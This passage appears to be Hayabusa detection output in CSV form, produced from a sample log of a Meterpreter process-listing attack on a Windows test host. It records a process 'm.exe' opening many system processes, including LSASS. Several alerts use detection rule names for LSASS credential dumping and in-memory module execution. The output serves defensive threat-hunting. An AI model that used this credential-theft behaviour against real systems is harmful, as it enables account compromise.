2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A74B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00103F4C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001043520000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001004550000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001072590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 500 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A3590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 616 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010BB700000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxService.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 676 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010E7AC0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 740 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00101AB00000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 804 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00105FB40000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 872 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001015C00000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 908 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010A7C40000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 956 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001014C90000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1016 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001012CF0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1148 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010F9D80000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\spoolsv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1288 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00100EED0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1328 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010B8F20000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1476 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010D30E0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1504 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-001062120100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1572 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010051A0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\bin\cygrunsrv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1732 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010443A0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1904 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010F7500100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\usr\sbin\sshd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1952 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-00108A560100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wlms\wlms.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1996 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-0010C65F0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\unsecapp.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1000 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001098750100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\sppsvc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1896 | Tgt PGUID:
365ABB72-F6A4-5CC7-0000-001020BA0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2160 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00100CD40100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2192 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-001094D70100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2360 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00108AFF0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\Google\Update\1.3.34.7\GoogleCrashHandler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2416 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-00103F140200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | 
Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2448 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-0010DC200200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\Dwm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2788 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010A25C0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxTray.exe | Src User: %SourceUser% | Tgt User: %TargetUser% 
| Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2908 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-00109B9A0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3016 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-00104DBB0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 